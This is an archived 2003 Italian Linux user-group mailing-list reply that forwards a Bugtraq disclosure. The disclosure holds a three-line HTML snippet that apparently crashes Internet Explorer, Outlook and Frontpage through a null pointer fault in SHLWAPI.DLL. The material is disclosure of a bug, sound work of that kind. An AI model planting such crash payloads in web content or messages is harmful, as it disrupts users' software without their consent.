glug:Re: bachi IE
Zingus J. Rinkle
glug@genova.linux.it
Sat, 3 May 2003 19:09:43 +0200
L'affare puzzava. Ma non mi tirai indietro. Non si puo` dire di
no ad una pupa di nome Paolo Gaggini che ti sussurra
cose di questo genere:
> Ma siamo abituati ai bachi Microsoft
Mah, alcuni sono di una tale magnitudine da rendere molto
difficile farci l'abitudine...
---------------------------------------------------------
Forwardo da bugtraq:
---------------------------------------------------------
From: Ramon Pinuaga Cascales <rpinuaga@s21sec.com>
To: bugtraq@securityfocus.com
Subject: IE / Outlook / MS SHLWAPI Render - more trivial crash
Hola:
Well, as it seems that is the Microsoft Crash mounth, let see another one:
---------------------------------
<html>
<form>
<input type crash>
</form>
</html>
---------------------------------
This will crash IE with the following error:
"Unhandled exception in iexplore.exe (SHLWAPI.DLL): 0xC0000005: Access
Violation"
It's a null pointer overwrite, so it's not easly exploitable...
This HTML also crash Outlook, Frontpage, and all the Microsoft
programs that use the shlwapi.dll library to render web code.
Plain HTML is a dangerous language :)
---------------------------------------------------------
Fine del forward
---------------------------------------------------------
Stupendo,
Zingus
--
_________ +-------------------------------------------------------+
\/ _____/ / http://as0.da.ru http://as1.da.ru icq:164939262 |
ZJR _____/ | alternative mailto:zingus_at_despammed.com |
/\______/ +-------------------------------------- Zingus J. Rinkle -+